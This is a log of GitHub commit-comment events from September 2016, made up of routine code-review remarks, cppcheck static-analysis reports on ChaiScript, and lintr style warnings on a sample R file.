{"id":"4575692962","type":"CommitCommentEvent","actor":{"login":"raydittmeier"},"repo":{"name":"USGS-EROS/espa-l2qa-tools"},"payload":{"comment":{"id":19058510,"position":null,"line":null,"path":null,"commit_id":"9ff38218befb99e89b2176b98e58dc6a43e531d2","created_at":"2016-09-16T18:41:13Z","updated_at":"2016-09-16T18:41:13Z","body":"This looks fine."}},"created_at":"2016-09-16T18:41:13Z"}
{"id":"4575696158","type":"CommitCommentEvent","actor":{"login":"lefticus"},"repo":{"name":"ChaiScript/ChaiScript"},"payload":{"comment":{"id":19058524,"position":null,"line":null,"path":null,"commit_id":"9cc0ce01b9790f0768a4bb46c24a66d582398564","created_at":"2016-09-16T18:41:51Z","updated_at":"2016-09-16T18:41:51Z","body":" contrib/codeanalysis/runcppcheck.sh: line 9: ../cppcheck-1.66/cppcheck: No such file or directory\n"}},"created_at":"2016-09-16T18:41:51Z"}
{"id":"4575698192","type":"CommitCommentEvent","actor":{"login":"sheiny"},"repo":{"name":"edubeckha/CG"},"payload":{"comment":{"id":19058528,"position":1,"line":3,"path":"include/line.h","commit_id":"f21f464948b39ecc9fdfbe658d60b67c6fca0945","created_at":"2016-09-16T18:42:17Z","updated_at":"2016-09-16T18:42:17Z","body":"Comments in ingrish mah :c"}},"created_at":"2016-09-16T18:42:17Z"}
{"id":"4575700321","type":"CommitCommentEvent","actor":{"login":"sherakama"},"repo":{"name":"SU-SWS/stanford_events_importer"},"payload":{"comment":{"id":19058535,"position":6,"line":432,"path":"stanford_events_importer.module","commit_id":"ad6575a2b2aa8371c46a24a22b827db78ccd476a","created_at":"2016-09-16T18:42:42Z","updated_at":"2016-09-16T18:42:42Z","body":"Can you add a watchdog log to this so we can alert Scott if it does pop up again?"}},"created_at":"2016-09-16T18:42:42Z"}
{"id":"4575701855","type":"CommitCommentEvent","actor":{"login":"ajpires"},"repo":{"name":"OpenDataRepository/data-publisher"},"payload":{"comment":{"id":19058542,"position":null,"line":null,"path":null,"commit_id":"a39cfa18be081222570df0b717a14db3510262c8","created_at":"2016-09-16T18:43:01Z","updated_at":"2016-09-16T18:43:01Z","body":"Going to need to delete cached table versions of all datarecords due to change in array structure."}},"created_at":"2016-09-16T18:43:01Z"}
{"id":"4575705289","type":"CommitCommentEvent","actor":{"login":"rodrigofariasm"},"repo":{"name":"rodrigofariasm/Analise-de-Dados-1"},"payload":{"comment":{"id":19058551,"position":22,"line":22,"path":"Prob 4 Cp 3/helpers.R","commit_id":"ac038c2f75be68167c75313cd5d95258c41cd4f6","created_at":"2016-09-16T18:43:42Z","updated_at":"2016-09-16T18:43:42Z","body":"\r\n# Pergunta 1: Usando inferência sobre os dados apresentados, podemos dizer qual é o filme mais popular de 2014?\r\n# Pergunta 2: Usando inferência podemos se os filmes mais bem avaliados de 2014 foram indicados ao Oscar ou alguma outra premiação\r\n"}},"created_at":"2016-09-16T18:43:42Z"}
{"id":"4575705296","type":"CommitCommentEvent","actor":{"login":"raydittmeier"},"repo":{"name":"USGS-EROS/espa-l2qa-tools"},"payload":{"comment":{"id":19058552,"position":null,"line":null,"path":null,"commit_id":"cd28f7200c8679b356712e5d10bb82edfc0a4bf4","created_at":"2016-09-16T18:43:42Z","updated_at":"2016-09-16T18:43:42Z","body":"The moves look fine."}},"created_at":"2016-09-16T18:43:42Z"}
{"id":"4575705806","type":"CommitCommentEvent","actor":{"login":"lefticus"},"repo":{"name":"ChaiScript/ChaiScript"},"payload":{"comment":{"id":19058556,"position":null,"line":null,"path":null,"commit_id":"26e6f51fa8e66eeaa91b5e058fd040a2411acf47","created_at":"2016-09-16T18:43:48Z","updated_at":"2016-09-16T18:43:48Z","body":" contrib/codeanalysis/runcppcheck.sh: line 9: ../cppcheck-1.66/cppcheck: No such file or directory\n"}},"created_at":"2016-09-16T18:43:48Z"}
{"id":"4575715527","type":"CommitCommentEvent","actor":{"login":"lefticus"},"repo":{"name":"ChaiScript/ChaiScript"},"payload":{"comment":{"id":19058573,"position":null,"line":null,"path":null,"commit_id":"cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c","created_at":"2016-09-16T18:45:47Z","updated_at":"2016-09-16T18:45:47Z","body":" - __information__: [src/chaiscript_stdlib.cpp:0](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/src/chaiscript_stdlib.cpp#L0) Too many #ifdef configurations - cppcheck only checks 12 of 16 configurations. Use --force to check all configurations. (toomanyconfigs)\n - __style__: [include/chaiscript/language/chaiscript_parser.hpp:679](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/include/chaiscript/language/chaiscript_parser.hpp#L679) Expression is always false because 'else if' condition matches previous condition at line 677. (multiCondition)\n - __style__: [include/chaiscript/language/chaiscript_parser.hpp:683](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/include/chaiscript/language/chaiscript_parser.hpp#L683) Expression is always false because 'else if' condition matches previous condition at line 681. (multiCondition)\n - __style__: [include/chaiscript/language/chaiscript_parser.hpp:685](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/include/chaiscript/language/chaiscript_parser.hpp#L685) Expression is always false because 'else if' condition matches previous condition at line 681. (multiCondition)\n - __style__: [include/chaiscript/language/chaiscript_parser.hpp:685](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/include/chaiscript/language/chaiscript_parser.hpp#L685) Expression is always false because 'else if' condition matches previous condition at line 683. (multiCondition)\n - __style__: [include/chaiscript/dispatchkit/boxed_value.hpp:248](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/include/chaiscript/dispatchkit/boxed_value.hpp#L248) 'operator=' should return reference to 'this' instance. (operatorEqRetRefThis)\n - __information__: [src/chaiscript_stdlib.cpp:1](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/src/chaiscript_stdlib.cpp#L1) Skipping configuration 'CHAISCRIPT_MSVC;max;min' since the value of 'max' is unknown. Use -D if you want to check it. You can use -U to skip it explicitly. (ConfigurationNotChecked)\n - __information__: [src/main.cpp:0](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/src/main.cpp#L0) Too many #ifdef configurations - cppcheck only checks 12 of 17 configurations. Use --force to check all configurations. (toomanyconfigs)\n - __information__: [src/main.cpp:1](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/src/main.cpp#L1) Skipping configuration 'CHAISCRIPT_MSVC;max;min' since the value of 'max' is unknown. Use -D if you want to check it. You can use -U to skip it explicitly. (ConfigurationNotChecked)\n - __style__: [src/chaiscript_stdlib.cpp:18](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/src/chaiscript_stdlib.cpp#L18) The function 'create_chaiscript_module_chaiscript_stdlib' is never used. (unusedFunction)\n - __style__: [src/main.cpp:169](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/src/main.cpp#L169) The function 'get_eval_error' is never used. (unusedFunction)\n - __style__: [src/main.cpp:140](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/src/main.cpp#L140) The function 'help' is never used. (unusedFunction)\n - __style__: [src/main.cpp:216](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/src/main.cpp#L216) The function 'myexit' is never used. (unusedFunction)\n - __style__: [src/main.cpp:158](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/src/main.cpp#L158) The function 'throws_exception' is never used. (unusedFunction)\n"}},"created_at":"2016-09-16T18:45:47Z"}
{"id":"4575715608","type":"CommitCommentEvent","actor":{"login":"ng-ui-dialog"},"repo":{"name":"ng-ui-dialog/ng-ui-dialog"},"payload":{"comment":{"id":19058574,"position":1,"line":1,"path":"README.md","commit_id":"1a82dd7be93c54900ddef8fb171d2a2b9765eef2","created_at":"2016-09-16T18:45:48Z","updated_at":"2016-09-16T18:45:48Z","body":"# AngularJS dialog directive"}},"created_at":"2016-09-16T18:45:48Z"}
{"id":"4575717657","type":"CommitCommentEvent","actor":{"login":"lefticus"},"repo":{"name":"ChaiScript/ChaiScript"},"payload":{"comment":{"id":19058586,"position":null,"line":null,"path":null,"commit_id":"cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c","created_at":"2016-09-16T18:46:12Z","updated_at":"2016-09-16T18:46:12Z","body":" - __information__: [src/chaiscript_stdlib.cpp:0](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/src/chaiscript_stdlib.cpp#L0) Too many #ifdef configurations - cppcheck only checks 12 of 16 configurations. Use --force to check all configurations. (toomanyconfigs)\n - __style__: [include/chaiscript/language/chaiscript_parser.hpp:679](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/include/chaiscript/language/chaiscript_parser.hpp#L679) Expression is always false because 'else if' condition matches previous condition at line 677. (multiCondition)\n - __style__: [include/chaiscript/language/chaiscript_parser.hpp:683](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/include/chaiscript/language/chaiscript_parser.hpp#L683) Expression is always false because 'else if' condition matches previous condition at line 681. (multiCondition)\n - __style__: [include/chaiscript/language/chaiscript_parser.hpp:685](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/include/chaiscript/language/chaiscript_parser.hpp#L685) Expression is always false because 'else if' condition matches previous condition at line 681. (multiCondition)\n - __style__: [include/chaiscript/language/chaiscript_parser.hpp:685](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/include/chaiscript/language/chaiscript_parser.hpp#L685) Expression is always false because 'else if' condition matches previous condition at line 683. (multiCondition)\n - __style__: [include/chaiscript/dispatchkit/boxed_value.hpp:248](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/include/chaiscript/dispatchkit/boxed_value.hpp#L248) 'operator=' should return reference to 'this' instance. (operatorEqRetRefThis)\n - __information__: [src/chaiscript_stdlib.cpp:1](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/src/chaiscript_stdlib.cpp#L1) Skipping configuration 'CHAISCRIPT_MSVC;max;min' since the value of 'max' is unknown. Use -D if you want to check it. You can use -U to skip it explicitly. (ConfigurationNotChecked)\n - __information__: [src/main.cpp:0](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/src/main.cpp#L0) Too many #ifdef configurations - cppcheck only checks 12 of 17 configurations. Use --force to check all configurations. (toomanyconfigs)\n - __information__: [src/main.cpp:1](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/src/main.cpp#L1) Skipping configuration 'CHAISCRIPT_MSVC;max;min' since the value of 'max' is unknown. Use -D if you want to check it. You can use -U to skip it explicitly. (ConfigurationNotChecked)\n - __style__: [src/chaiscript_stdlib.cpp:18](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/src/chaiscript_stdlib.cpp#L18) The function 'create_chaiscript_module_chaiscript_stdlib' is never used. (unusedFunction)\n - __style__: [src/main.cpp:169](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/src/main.cpp#L169) The function 'get_eval_error' is never used. (unusedFunction)\n - __style__: [src/main.cpp:140](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/src/main.cpp#L140) The function 'help' is never used. (unusedFunction)\n - __style__: [src/main.cpp:216](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/src/main.cpp#L216) The function 'myexit' is never used. (unusedFunction)\n - __style__: [src/main.cpp:158](../blob/cefb4d3c7801ee9b0e45a74c16ef1953a8893f1c/src/main.cpp#L158) The function 'throws_exception' is never used. (unusedFunction)\n"}},"created_at":"2016-09-16T18:46:12Z"}
{"id":"4575719902","type":"CommitCommentEvent","actor":{"login":"audreyr"},"repo":{"name":"pydanny/cookiecutter-django"},"payload":{"comment":{"id":19058594,"position":null,"line":null,"path":null,"commit_id":"da42b3854d85b1df42c67e4e5f3d9131aacecd2c","created_at":"2016-09-16T18:46:39Z","updated_at":"2016-09-16T18:46:39Z","body":"Oops, changing this back"}},"created_at":"2016-09-16T18:46:39Z"}
{"id":"4575720596","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"AtomLinter/linter-lintr"},"payload":{"comment":{"id":19058598,"position":null,"line":null,"path":null,"commit_id":"dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215","created_at":"2016-09-16T18:46:47Z","updated_at":"2016-09-16T18:46:47Z","body":"[/tmp/atom-linter_14881BoARxzEfqDN0/bad.R:1:5:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14881BoARxzEfqDN0/bad.R#L1) *style:* **Use <-, not =, for assignment.**\n```r\n​fun = function(one)\n    ^\n```\n[/tmp/atom-linter_14881BoARxzEfqDN0/bad.R:2:1:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14881BoARxzEfqDN0/bad.R#L2) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​{\n^\n```\n[/tmp/atom-linter_14881BoARxzEfqDN0/bad.R:3:3:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14881BoARxzEfqDN0/bad.R#L3) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​  one.plus.one <- oen + 1\n  ^~~~~~~~~~~~\n```\n[/tmp/atom-linter_14881BoARxzEfqDN0/bad.R:3:3:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14881BoARxzEfqDN0/bad.R#L3) *warning:* **local variable ‘one.plus.one’ assigned but may not be used**\n```r\n​  one.plus.one <- oen + 1\n  ^~~~~~~~~~~~\n```\n[/tmp/atom-linter_14881BoARxzEfqDN0/bad.R:3:19:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14881BoARxzEfqDN0/bad.R#L3) *warning:* **no visible binding for global variable ‘oen’, Did you mean 'one'?**\n```r\n​  one.plus.one <- oen + 1\n                  ^~~\n```\n[/tmp/atom-linter_14881BoARxzEfqDN0/bad.R:4:11:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14881BoARxzEfqDN0/bad.R#L4) *style:* **Variable and function names should be all lowercase.**\n```r\n​  four <- newVar <- matrix(1:10,nrow = 2)\n          ^~~~~~\n```\n[/tmp/atom-linter_14881BoARxzEfqDN0/bad.R:4:11:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14881BoARxzEfqDN0/bad.R#L4) *warning:* **local variable ‘newVar’ assigned but may not be used**\n```r\n​  four <- newVar <- matrix(1:10,nrow = 2)\n          ^~~~~~\n```\n[/tmp/atom-linter_14881BoARxzEfqDN0/bad.R:4:33:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14881BoARxzEfqDN0/bad.R#L4) *style:* **Commas should always have a space after.**\n```r\n​  four <- newVar <- matrix(1:10,nrow = 2)\n                                ^\n```\n[/tmp/atom-linter_14881BoARxzEfqDN0/bad.R:5:7:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14881BoARxzEfqDN0/bad.R#L5) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  four[ 1, ]\n      ^\n```\n[/tmp/atom-linter_14881BoARxzEfqDN0/bad.R:6:10:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14881BoARxzEfqDN0/bad.R#L6) *style:* **Only use double-quotes.**\n```r\n​  txt <- 'hi'\n         ^~~~\n```\n[/tmp/atom-linter_14881BoARxzEfqDN0/bad.R:7:3:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14881BoARxzEfqDN0/bad.R#L7) *warning:* **local variable ‘three’ assigned but may not be used**\n```r\n​  three <- two+ 1\n  ^~~~~\n```\n[/tmp/atom-linter_14881BoARxzEfqDN0/bad.R:7:12:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14881BoARxzEfqDN0/bad.R#L7) *warning:* **no visible binding for global variable ‘two’, Did you mean 'txt'?**\n```r\n​  three <- two+ 1\n           ^~~\n```\n[/tmp/atom-linter_14881BoARxzEfqDN0/bad.R:7:15:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14881BoARxzEfqDN0/bad.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​  three <- two+ 1\n             ~^\n```\n[/tmp/atom-linter_14881BoARxzEfqDN0/bad.R:8:5:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14881BoARxzEfqDN0/bad.R#L8) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(txt == 'hi') 4\n    ^\n```\n[/tmp/atom-linter_14881BoARxzEfqDN0/bad.R:8:13:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14881BoARxzEfqDN0/bad.R#L8) *style:* **Only use double-quotes.**\n```r\n​  if(txt == 'hi') 4\n            ^~~~\n```\n[/tmp/atom-linter_14881BoARxzEfqDN0/bad.R:9:4:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14881BoARxzEfqDN0/bad.R#L9) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​  5}  \n   ^\n```\n[/tmp/atom-linter_14881BoARxzEfqDN0/bad.R:9:5:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14881BoARxzEfqDN0/bad.R#L9) *style:* **Trailing whitespace is superfluous.**\n```r\n​  5}  \n    ^~\n```\n[/tmp/atom-linter_14881BoARxzEfqDN0/bad.R:11:0:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14881BoARxzEfqDN0/bad.R#L11) *error:* **unexpected end of input**\n```r\n​\n\n```\n[/tmp/atom-linter_14881BoARxzEfqDN0/bad.R:11:1:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14881BoARxzEfqDN0/bad.R#L11) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```"}},"created_at":"2016-09-16T18:46:47Z"}
{"id":"4575721508","type":"CommitCommentEvent","actor":{"login":"edubeckha"},"repo":{"name":"edubeckha/CG"},"payload":{"comment":{"id":19058603,"position":1,"line":3,"path":"include/line.h","commit_id":"f21f464948b39ecc9fdfbe658d60b67c6fca0945","created_at":"2016-09-16T18:46:59Z","updated_at":"2016-09-16T18:46:59Z","body":"i dont want to spend much time thinking in english, thats why many of my comments are in portuguese =)"}},"created_at":"2016-09-16T18:46:59Z"}
{"id":"4575723696","type":"CommitCommentEvent","actor":{"login":"edubeckha"},"repo":{"name":"edubeckha/CG"},"payload":{"comment":{"id":19058607,"position":15,"line":13,"path":"include/point.h","commit_id":"f21f464948b39ecc9fdfbe658d60b67c6fca0945","created_at":"2016-09-16T18:47:25Z","updated_at":"2016-09-16T18:47:25Z","body":"yes we can do it later with asserts"}},"created_at":"2016-09-16T18:47:25Z"}
{"id":"4575724040","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"AtomLinter/linter-lintr"},"payload":{"comment":{"id":19058608,"position":null,"line":null,"path":null,"commit_id":"dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215","created_at":"2016-09-16T18:47:29Z","updated_at":"2016-09-16T18:47:29Z","body":"[/tmp/atom-linter_14894w7RqmZIfIWat/bad.R:1:5:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14894w7RqmZIfIWat/bad.R#L1) *style:* **Use <-, not =, for assignment.**\n```r\n​fun = function(one)\n    ^\n```\n[/tmp/atom-linter_14894w7RqmZIfIWat/bad.R:2:1:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14894w7RqmZIfIWat/bad.R#L2) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​{\n^\n```\n[/tmp/atom-linter_14894w7RqmZIfIWat/bad.R:3:3:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14894w7RqmZIfIWat/bad.R#L3) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​  one.plus.one <- oen + 1\n  ^~~~~~~~~~~~\n```\n[/tmp/atom-linter_14894w7RqmZIfIWat/bad.R:3:3:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14894w7RqmZIfIWat/bad.R#L3) *warning:* **local variable ‘one.plus.one’ assigned but may not be used**\n```r\n​  one.plus.one <- oen + 1\n  ^~~~~~~~~~~~\n```\n[/tmp/atom-linter_14894w7RqmZIfIWat/bad.R:3:19:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14894w7RqmZIfIWat/bad.R#L3) *warning:* **no visible binding for global variable ‘oen’, Did you mean 'one'?**\n```r\n​  one.plus.one <- oen + 1\n                  ^~~\n```\n[/tmp/atom-linter_14894w7RqmZIfIWat/bad.R:4:11:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14894w7RqmZIfIWat/bad.R#L4) *style:* **Variable and function names should be all lowercase.**\n```r\n​  four <- newVar <- matrix(1:10,nrow = 2)\n          ^~~~~~\n```\n[/tmp/atom-linter_14894w7RqmZIfIWat/bad.R:4:11:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14894w7RqmZIfIWat/bad.R#L4) *warning:* **local variable ‘newVar’ assigned but may not be used**\n```r\n​  four <- newVar <- matrix(1:10,nrow = 2)\n          ^~~~~~\n```\n[/tmp/atom-linter_14894w7RqmZIfIWat/bad.R:4:33:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14894w7RqmZIfIWat/bad.R#L4) *style:* **Commas should always have a space after.**\n```r\n​  four <- newVar <- matrix(1:10,nrow = 2)\n                                ^\n```\n[/tmp/atom-linter_14894w7RqmZIfIWat/bad.R:5:7:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14894w7RqmZIfIWat/bad.R#L5) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  four[ 1, ]\n      ^\n```\n[/tmp/atom-linter_14894w7RqmZIfIWat/bad.R:6:10:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14894w7RqmZIfIWat/bad.R#L6) *style:* **Only use double-quotes.**\n```r\n​  txt <- 'hi'\n         ^~~~\n```\n[/tmp/atom-linter_14894w7RqmZIfIWat/bad.R:7:3:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14894w7RqmZIfIWat/bad.R#L7) *warning:* **local variable ‘three’ assigned but may not be used**\n```r\n​  three <- two+ 1\n  ^~~~~\n```\n[/tmp/atom-linter_14894w7RqmZIfIWat/bad.R:7:12:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14894w7RqmZIfIWat/bad.R#L7) *warning:* **no visible binding for global variable ‘two’, Did you mean 'txt'?**\n```r\n​  three <- two+ 1\n           ^~~\n```\n[/tmp/atom-linter_14894w7RqmZIfIWat/bad.R:7:15:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14894w7RqmZIfIWat/bad.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​  three <- two+ 1\n             ~^\n```\n[/tmp/atom-linter_14894w7RqmZIfIWat/bad.R:8:5:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14894w7RqmZIfIWat/bad.R#L8) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(txt == 'hi') 4\n    ^\n```\n[/tmp/atom-linter_14894w7RqmZIfIWat/bad.R:8:13:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14894w7RqmZIfIWat/bad.R#L8) *style:* **Only use double-quotes.**\n```r\n​  if(txt == 'hi') 4\n            ^~~~\n```\n[/tmp/atom-linter_14894w7RqmZIfIWat/bad.R:9:4:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14894w7RqmZIfIWat/bad.R#L9) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​  5}  \n   ^\n```\n[/tmp/atom-linter_14894w7RqmZIfIWat/bad.R:9:5:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14894w7RqmZIfIWat/bad.R#L9) *style:* **Trailing whitespace is superfluous.**\n```r\n​  5}  \n    ^~\n```\n[/tmp/atom-linter_14894w7RqmZIfIWat/bad.R:11:0:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14894w7RqmZIfIWat/bad.R#L11) *error:* **unexpected end of input**\n```r\n​\n\n```\n[/tmp/atom-linter_14894w7RqmZIfIWat/bad.R:11:1:](https://github.com/AtomLinter/linter-lintr/blob/dc281b5fd2bbeb40b6b48da5fbffc8c9d9d75215//tmp/atom-linter_14894w7RqmZIfIWat/bad.R#L11) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```"}},"created_at":"2016-09-16T18:47:29Z"}
{"id":"4575725177","type":"CommitCommentEvent","actor":{"login":"akien-mga"},"repo":{"name":"godotengine/asset-library"},"payload":{"comment":{"id":19058610,"position":9,"line":12,"path":"templates/edit_asset_edit.phtml","commit_id":"48da8fa29535e1311e1ea1196912b784f4bd0843","created_at":"2016-09-16T18:47:44Z","updated_at":"2016-09-16T18:47:44Z","body":"s/allways/always/"}},"created_at":"2016-09-16T18:47:44Z"}
{"id":"4575725307","type":"CommitCommentEvent","actor":{"login":"vliedel"},"repo":{"name":"crownstone/bluenet"},"payload":{"comment":{"id":19058612,"position":null,"line":null,"path":null,"commit_id":"a9029b8548b9ca680b622b6b0498f07f00ab336c","created_at":"2016-09-16T18:47:46Z","updated_at":"2016-09-16T18:47:46Z","body":"Low and high are now switched compared to my last [commit](https://github.com/crownstone/bluenet/commit/2d25c9e18340cdc0418751655bca01ff7ce8e7ad), but I didn't test that very thoroughly either."}},"created_at":"2016-09-16T18:47:46Z"}
{"id":"4575728536","type":"CommitCommentEvent","actor":{"login":"edubeckha"},"repo":{"name":"edubeckha/CG"},"payload":{"comment":{"id":19058622,"position":14,"line":41,"path":"include/window.h","commit_id":"f21f464948b39ecc9fdfbe658d60b67c6fca0945","created_at":"2016-09-16T18:48:25Z","updated_at":"2016-09-16T18:48:25Z","body":"NO IT ISNT, I forgot to change it back. IDK why I put a minus in there. I think that I was just testing some stuff and forgot to turn it back to what it was before"}},"created_at":"2016-09-16T18:48:25Z"}
{"id":"4575733828","type":"CommitCommentEvent","actor":{"login":"sh999"},"repo":{"name":"sh999/exonized-alu"},"payload":{"comment":{"id":19058634,"position":null,"line":null,"path":null,"commit_id":"cce3e8d29c73565e427145cfe7589009ed368eac","created_at":"2016-09-16T18:49:28Z","updated_at":"2016-09-16T18:49:28Z","body":"Pernicious bug that involves pushing back two different times, where I mistakenly assumed that the pushed alus will have the same addresses."}},"created_at":"2016-09-16T18:49:28Z"}
{"id":"4575734537","type":"CommitCommentEvent","actor":{"login":"edubeckha"},"repo":{"name":"edubeckha/CG"},"payload":{"comment":{"id":19058637,"position":14,"line":41,"path":"include/window.h","commit_id":"f21f464948b39ecc9fdfbe658d60b67c6fca0945","created_at":"2016-09-16T18:49:37Z","updated_at":"2016-09-16T18:49:37Z","body":"thanks for the remember"}},"created_at":"2016-09-16T18:49:37Z"}
